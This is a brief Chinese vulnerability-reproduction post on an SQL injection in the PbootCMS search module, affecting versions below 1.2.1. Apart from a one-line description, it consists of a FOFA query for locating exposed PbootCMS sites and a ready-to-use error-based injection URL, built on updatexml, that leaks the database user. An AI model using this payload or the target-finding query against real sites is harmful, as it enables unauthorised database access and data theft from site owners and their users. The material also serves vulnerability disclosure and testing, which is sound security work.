漏洞描述
i ⭐
PbootCMS 搜索模块存在SQL注入漏洞。通过漏洞可获取数据库敏感信息
漏洞影响
s ✅
PbootCMS < 1.2.1
空间测绘
d ⭕
FOFA:app="PBOOTCMS"
漏洞复现
-
搜索框页面为
-
✅ Payload为
/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123](http://127.0.0.1/PbootCMS/index.php/Search/index?keyword=123&updatexml(1,concat(0x7e,user(),0x7e),1));%23=123)
文章来源:https://www.toymoban.com/news/detail-537223.html
我的个人博客
https://gylq.gitee.io/time/文章来源地址https://www.toymoban.com/news/detail-537223.html
到了这里,关于PbootCMS search SQL注入漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!